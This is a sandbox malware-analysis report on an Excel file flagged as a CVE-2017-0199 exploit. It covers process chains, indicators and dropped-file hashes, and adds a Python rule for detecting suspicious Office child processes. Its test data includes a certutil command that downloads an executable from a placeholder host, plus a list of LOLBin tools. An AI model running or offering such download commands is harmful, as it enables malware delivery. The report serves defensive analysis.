Windows
Analysis Report
Ref_Order04.xls
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- EXCEL.EXE (PID: 1908, cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, MD5: D53B85E21886D2AF9815C377537BCAC3)
  - AcroRd32.exe (PID: 3088, cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding, MD5: 2F8D93826B8CBF9290BC57535C7A6817)
    - RdrCEF.exe (PID: 3400, cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043, MD5: 326A645391A97C760B60C558A35BB068)

AcroRd32.exe is started by Excel with -Embedding, i.e. COM-activated as the in-place server for an embedded OLE object; the MBD0001E584 CompObj stream listed at the end of this report identifies that object as an Acrobat Document (ProgID AcroExch.Document.DC). RdrCEF.exe is Reader's own Chromium helper.
- cleanup
Sigma rule matches (rule authors as listed in the report):
- Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton
- X__Junior (Nextron Systems)
- frack113
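The process chain above (an Office host COM-activating another application) is the kind of parent/child relationship the matched Sigma rules key on. As an added example, not code from the report and not one of the Sigma rules it cites, the rule below scores Sysmon Event ID 1 style process-creation events: an Office parent spawning a scripting or LOLBin child is high severity, while a child started with -Embedding (an OLE server, exactly the EXCEL.EXE to AcroRd32.exe hop recorded here) is medium and points the analyst at the embedded object rather than at the child. The first two events are the chain from this report; the splwow64.exe and cmd.exe events are constructed for the test and were not observed in the analysis. OFFICE_HOSTS, HIGH_RISK_CHILDREN and EXPECTED_CHILDREN are this example's own lists, not the report's.

```python
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe",
                "msaccess.exe", "mspub.exe", "visio.exe"}
# Children that almost never have a legitimate reason to be spawned by an Office host.
HIGH_RISK_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                      "bitsadmin.exe", "msiexec.exe", "schtasks.exe", "wmic.exe"}
# Helpers Office starts on its own (printing, crash reporting); suppressed to keep the rule quiet.
EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe", "dwwin.exe", "werfault.exe", "msosync.exe"}

# Sysmon Event ID 1 field names. Events 0 and 1 are the chain recorded in this report;
# events 2 and 3 are constructed for this example and were not observed in the analysis.
SAMPLE_EVENTS = [
    {"ProcessId": 3088,
     "Image": r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
     "CommandLine": r'"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding',
     "ParentProcessId": 1908,
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentCommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
    {"ProcessId": 3400,
     "Image": r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe",
     "CommandLine": r'"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043',
     "ParentProcessId": 3088,
     "ParentImage": r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
     "ParentCommandLine": r'"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding'},
    {"ProcessId": 4100,  # constructed: print helper Excel spawns by itself
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288",
     "ParentProcessId": 1908,
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentCommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
    {"ProcessId": 4212,  # constructed: the kind of child a macro or exploit payload starts
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://example.invalid/a.exe %TEMP%\a.exe",
     "ParentProcessId": 1908,
     "ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentCommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _has_flag(cmdline: str, flag: str) -> bool:
    """True if the command line contains the flag as a separate token (case-insensitive)."""
    flag = flag.lower()
    return any(tok.lower() == flag for tok in cmdline.split())


def evaluate(event: dict):
    """Return an alert dict for an Office parent -> suspicious child event, else None."""
    parent = _basename(event["ParentImage"])
    child = _basename(event["Image"])
    if parent not in OFFICE_HOSTS or child in OFFICE_HOSTS or child in EXPECTED_CHILDREN:
        return None
    base = {"parent": parent, "child": child, "pid": event["ProcessId"]}
    if child in HIGH_RISK_CHILDREN:
        return {**base, "severity": "high",
                "reason": "Office host spawned a scripting/LOLBin child"}
    if _has_flag(event["CommandLine"], "-Embedding"):
        # COM activation: the child is the server for an embedded OLE object.
        return {**base, "severity": "medium",
                "reason": "OLE server activated for an embedded object; inspect the document's embedded objects"}
    return {**base, "severity": "medium",
            "reason": "Office host spawned an unexpected child"}


def scan(events):
    """Apply evaluate() to every event and keep the alerts, in input order."""
    return [alert for alert in (evaluate(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['parent']} -> {alert['child']} (pid {alert['pid']}): {alert['reason']}")
```

The -Embedding check is what keeps this rule usable: Excel activating Acrobat for an embedded PDF is common in legitimate documents, so the medium alert is there to direct the analyst to the OLE object list rather than to page anyone, while the high alert fires only for children Excel has no business starting.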
AV Detection
Source: | Avira URL Cloud: |
Source: | Virustotal: |
Source: | Virustotal: |
Source: | ReversingLabs: |
Source: | Virustotal: |
Source: | File opened: |
Software Vulnerabilities
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | File created: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Stream path 'MBD0001E586/\x1Ole' : |
Source: | Stream path 'MBD0001E586/\x1Ole' : |
Source: | Classification label: | mal68.expl.winXLS@10/23@1/1 |
Source: | File created: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | ReversingLabs: |
Source: | Virustotal: |
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Process information set: |
Source: | Stream path 'MBD0001E584/CONTENTS' entropy: | ||
Source: | Stream path 'Workbook' entropy: | ||
Source: | Stream path 'MBD0001E584/CONTENTS' entropy: | ||
Source: | Stream path 'Workbook' entropy: |
Techniques shown with a leading count were matched by signatures in this analysis (13 Exploitation for Client Execution, 1 Process Injection, 1 Masquerading, 1 Obfuscated Files or Information, 1 File and Directory Discovery, 1 System Information Discovery, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, 2 Ingress Tool Transfer); the remaining cells are the unmatched matrix template.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 13 Exploitation for Client Execution | Path Interception | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
Source | Detection | Scanner | Label |
---|---|---|---|
 | 26% | ReversingLabs | Document-Office.Exploit.CVE-2017-0199 |
 | 27% | Virustotal | |

Source | Detection | Scanner | Label |
---|---|---|---|
 | 8% | Virustotal | |

Source | Detection | Scanner | Label |
---|---|---|---|
 | 100% | Avira URL Cloud | phishing |
 | 7% | Virustotal | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bun.is | 76.76.21.98 | true | false | | unknown |

Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | false | | unknown |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
76.76.21.98 | bun.is | United States | 16509 | AMAZON-02US | false |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1430742 |
Start date and time: | 2024-04-24 06:49:49 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 14s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 9 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Ref_Order04.xls |
Detection: | MAL |
Classification: | mal68.expl.winXLS@10/23@1/1 |
EGA Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
06:51:05 | API Interceptor | |
06:51:20 | API Interceptor |
Other samples in the sandbox's history that contacted the same IP (76.76.21.98):

Match | Detection | Threat Name |
---|---|---|
76.76.21.98 | malicious | FormBook, PureLog Stealer |
76.76.21.98 | malicious | FormBook |
76.76.21.98 | malicious | FormBook |
76.76.21.98 | malicious | FormBook |
76.76.21.98 | malicious | FormBook |
76.76.21.98 | malicious | Unknown |
76.76.21.98 | malicious | Unknown |
76.76.21.98 | malicious | FormBook |
76.76.21.98 | malicious | FormBook, GuLoader |
76.76.21.98 | malicious | FormBook, GuLoader |

Samples that contacted the same domain (bun.is):

Match | Detection | Threat Name |
---|---|---|
bun.is | malicious | Unknown |
bun.is | malicious | Unknown |

Samples that contacted the same ASN (AMAZON-02US). This ASN covers a large share of AWS, so overlap at ASN level carries little signal on its own; the IP and domain overlaps above are the ones worth pivoting on.

Match | Detection | Threat Name |
---|---|---|
AMAZON-02US | malicious | Mirai, Okiru |
AMAZON-02US | malicious | Python Stealer |
AMAZON-02US | malicious | HTMLPhisher |
AMAZON-02US | malicious | Unknown |
AMAZON-02US | malicious | PureLog Stealer, zgRAT |
AMAZON-02US | malicious | Unknown |
AMAZON-02US | malicious | HTMLPhisher |
AMAZON-02US | malicious | Unknown |
AMAZON-02US | malicious | PureLog Stealer, Xmrig, zgRAT |
AMAZON-02US | malicious | HtmlDropper, HTMLPhisher |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 270336 |
Entropy (8bit): | 0.0018885380473555064 |
Encrypted: | false |
SSDEEP: | 3:MsEllllkEthXllkl2zE+/pRDQ+:/M/xT02zBlQ+ |
MD5: | 7E3D4B739F9FA9DD2E64442186DFE098 |
SHA1: | 88E2764FE0BB443866877C5B332BE3DC3A907AD2 |
SHA-256: | D3A8660490BB7C951FA100B46C85195F71F1BB894207896F43AEBCF423076C5E |
SHA-512: | 2B67EBB1735E4E41BD55C11A875840C51252634B92FC3FDDCB4EF2A3E4C48DB3887C367582D0A9CD7ADAE9ABB25F3D5A242E9A7D37464CF397B81B5779F9B23F |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.231344302669386 |
Encrypted: | false |
SSDEEP: | 6:2hXjq2PP2nKuAl9OmbnIFUt8nhXVZmw+nhXHkwOP2nKuAl9OmbjLJ:YzvWHAahFUt8hl/+h357HAaSJ |
MD5: | 3D6981488EE65ACBA1EC63A2C907A9AB |
SHA1: | C789C66896DAC90EE9B9D8DA41DCA010C28E5159 |
SHA-256: | 9C5D1B8596C120FA4A5E1BF0303FBAF38F7D06BABA39B6D2E5CB9A222ECEF961 |
SHA-512: | C5E62DF6C82DB851E5E468D7387B660CE20CECB5E5095B4F112B3D82D52579DF14934C8A75A1302DC049A96C8D39A78AF7B3345B8DE21944F9C8F3459D6BE9EA |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.231344302669386 |
Encrypted: | false |
SSDEEP: | 6:2hXjq2PP2nKuAl9OmbnIFUt8nhXVZmw+nhXHkwOP2nKuAl9OmbjLJ:YzvWHAahFUt8hl/+h357HAaSJ |
MD5: | 3D6981488EE65ACBA1EC63A2C907A9AB |
SHA1: | C789C66896DAC90EE9B9D8DA41DCA010C28E5159 |
SHA-256: | 9C5D1B8596C120FA4A5E1BF0303FBAF38F7D06BABA39B6D2E5CB9A222ECEF961 |
SHA-512: | C5E62DF6C82DB851E5E468D7387B660CE20CECB5E5095B4F112B3D82D52579DF14934C8A75A1302DC049A96C8D39A78AF7B3345B8DE21944F9C8F3459D6BE9EA |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF5ff8c1.TMP (copy)
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.231344302669386 |
Encrypted: | false |
SSDEEP: | 6:2hXjq2PP2nKuAl9OmbnIFUt8nhXVZmw+nhXHkwOP2nKuAl9OmbjLJ:YzvWHAahFUt8hl/+h357HAaSJ |
MD5: | 3D6981488EE65ACBA1EC63A2C907A9AB |
SHA1: | C789C66896DAC90EE9B9D8DA41DCA010C28E5159 |
SHA-256: | 9C5D1B8596C120FA4A5E1BF0303FBAF38F7D06BABA39B6D2E5CB9A222ECEF961 |
SHA-512: | C5E62DF6C82DB851E5E468D7387B660CE20CECB5E5095B4F112B3D82D52579DF14934C8A75A1302DC049A96C8D39A78AF7B3345B8DE21944F9C8F3459D6BE9EA |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.005597679101775777 |
Encrypted: | false |
SSDEEP: | 3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l |
MD5: | FD55D575475A6BD81B055F46FA34BA8B |
SHA1: | 289A6344929F221E19D2F9097A5907FE42C03855 |
SHA-256: | 261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB |
SHA-512: | F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 536 |
Entropy (8bit): | 5.17576513886526 |
Encrypted: | false |
SSDEEP: | 12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa |
MD5: | 4D5E3CD969F14362210F0473720C5528 |
SHA1: | AFD90E9888759B809F78E87D5550B601A288A0A3 |
SHA-256: | 79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE |
SHA-512: | B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 536 |
Entropy (8bit): | 5.17576513886526 |
Encrypted: | false |
SSDEEP: | 12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa |
MD5: | 4D5E3CD969F14362210F0473720C5528 |
SHA1: | AFD90E9888759B809F78E87D5550B601A288A0A3 |
SHA-256: | 79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE |
SHA-512: | B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 536 |
Entropy (8bit): | 5.17576513886526 |
Encrypted: | false |
SSDEEP: | 12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa |
MD5: | 4D5E3CD969F14362210F0473720C5528 |
SHA1: | AFD90E9888759B809F78E87D5550B601A288A0A3 |
SHA-256: | 79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE |
SHA-512: | B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9566 |
Entropy (8bit): | 5.226610011802065 |
Encrypted: | false |
SSDEEP: | 192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV |
MD5: | 63B24EA3A13EAC476D6309BB202EF459 |
SHA1: | 89502C393549C20C933E4553F51F74F3DBE085EF |
SHA-256: | 2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA |
SHA-512: | 2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 9566 |
Entropy (8bit): | 5.226610011802065 |
Encrypted: | false |
SSDEEP: | 192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV |
MD5: | 63B24EA3A13EAC476D6309BB202EF459 |
SHA1: | 89502C393549C20C933E4553F51F74F3DBE085EF |
SHA-256: | 2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA |
SHA-512: | 2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 128373 |
Entropy (8bit): | 1.984352562880039 |
Encrypted: | false |
SSDEEP: | 384:hNzyk+spBXiosQUYuoB7OdnGbLq+ACtKzZQ9w/fQ1D+v+W2gnHwvAgIEyXG1oJ/J:nUwvgnHwvAP |
MD5: | B4621E956E08FFC84D8E099B27014FEE |
SHA1: | CB4604EED70C03ABADD11C5EF15E566B8A9802E4 |
SHA-256: | 0C42B243A4C3673436D22F0C51033E2306005CDB0CFCB82A849452BD3E741CF7 |
SHA-512: | A99A6769B42241891C83EDD62CD4E4027BBF2F5BC716B4ED01CFDBE7312526C5DA8A3D37EB2D471C0A707952A6D8C9143A921FA7428B9F46105583549540DC47 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74B64408.emf
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 884312 |
Entropy (8bit): | 1.2944965349348616 |
Encrypted: | false |
SSDEEP: | 1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw |
MD5: | 9ABE7EB352E0DB96B52C99AC2FDEA85F |
SHA1: | 8DC45D02308275BA32B7FFB320A3042256D40C8B |
SHA-256: | EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869 |
SHA-512: | E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\93FFC36E.emf
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 433328 |
Entropy (8bit): | 5.8206344778963315 |
Encrypted: | false |
SSDEEP: | 6144:Eifm7kwvqU4iyCbPUV7gdaI6z0R/sjBx2:El7kwvqULUVS |
MD5: | 6B99820E458A1554581172871C434794 |
SHA1: | AA00D426A3839A846BC0AF34F9482436B4644A21 |
SHA-256: | DF2A8C72AACDBCA3E8A08E06B12883E26FDBDD897663066C1CF2E2ADC191DBFB |
SHA-512: | E208704C45CAE468109739AB538DEABA7065855CC6390C0B5B03C74CC3604B68AE88326CF19F04F0BA3758E27CEA109D00552F36C30C94C4CD88FD3992AF9151 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFC4C163.emf
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330948 |
Entropy (8bit): | 4.968960210622998 |
Encrypted: | false |
SSDEEP: | 3072:U0Bd8yCKdQW2222222Igccz3/qSmV1XITSuaZgOTARfMDc1ji:U0Bd8yCKdQRzw4muaZ9TARfMDcFi |
MD5: | 91332E8817A65272B66F6E4358538A1E |
SHA1: | D78D03B17F1BA6148A466494DAA7C800CD977EE4 |
SHA-256: | AE74113545E649795ABE01344C3BC2243F089D32F5187A6E76DB47EF0218A41E |
SHA-512: | 238AA45D6498CCF7A04260B69E4DAAD3978A83ED112639980B4711AD403986A9A7D42BEEAEDFA8698A5E8029AC014FB46578D55000A850CD039EFD2DA1A886E7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F45EDAE1.emf
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 884312 |
Entropy (8bit): | 1.2944875740888722 |
Encrypted: | false |
SSDEEP: | 1536:k3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:5ux/ZiOE85e+8J2dvRcvMyw |
MD5: | B6DFB3AA7AC4A1A52336C30FA821857B |
SHA1: | 66ECB808A516AC5B07A01CDFCAD65FD7B9907619 |
SHA-256: | E22202331F689D7568E674B0DCD895DF66FAC5980498F05A846DE244AB3394C4 |
SHA-512: | A13562F976BCBEEF7D4B4926C37E39BFD4C588EF6E746792B806E6737C91604175395021D4884493D764CE7F0EE2ACC6C7D03A6045A5B4ED6616E5D7E4C9FE94 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155648 |
Entropy (8bit): | 6.379715205999407 |
Encrypted: | false |
SSDEEP: | 3072:BZkJAg153pIYYFxEtjPOtioVjDGUU1qfDlaGGx+cugLX0d6vwE/zDiamh3mJUxLy:BZunAxEtjPOtioVjDGUU1qfDlavx+fg/ |
MD5: | FE33C379A1B420B679015AE46AAB85A0 |
SHA1: | D07BF94EC2A04D0BE7DDEBDAB52ABE589CDB49DD |
SHA-256: | 6B94BEA53556D9C2E58DCCBA1AF0C70F19003211F86D08FBFCC240E59FD2F162 |
SHA-512: | 33CF352D34CBCB7BF0A240ADE4939E55B6F95AF2D5AD4F8AE3919CAC7C381B591D97A529153A074D2516E2F9E831EA807BCDCB34122BA158899A382559F238D6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10240 |
Entropy (8bit): | 0.6739662216458647 |
Encrypted: | false |
SSDEEP: | 12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R |
MD5: | C61F99FE7BEE945FC31B62121BE075CD |
SHA1: | 083BBD0568633FECB8984002EB4FE8FA08E17DD9 |
SHA-256: | 1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732 |
SHA-512: | 46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 24152 |
Entropy (8bit): | 0.7532185028349225 |
Encrypted: | false |
SSDEEP: | 48:CMnfnO4FGtsFqN6t8nlztZKR6axR6uiozVb:ZnfO4kWKpZKdxR35 |
MD5: | 520FE964934AF1AB0CEBA2366830D0FA |
SHA1: | B90310ACA870261CB619FDFD1E54E1B1A25074FF |
SHA-256: | DBD45EEA386D364B30BA189E079BFA05C2C40D9E5E83722C39A171998ED079C1 |
SHA-512: | A4839A6AB8DB522D9121A590B8C711E8C4F172D9CB71C918860F8048472920F3341B7BA624DFF514BE397809149E4471B2DF981DC81FE77C26B2DDF342A42F8C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 355328 |
Entropy (8bit): | 7.8384390402996065 |
Encrypted: | false |
SSDEEP: | 6144:uSunQxEtjPOtioVjDGUU1qfDlavx+fgLX0d6XivFbVIO/Z6wXlyeFf5mTy/1zwqs:uTZYbVDMwXlHNmy/5Xl8D |
MD5: | FB94BDA2B8A5908CA1EFDAA64278667C |
SHA1: | C581CA896A6EA34CC8A8346D75918FC883699FA5 |
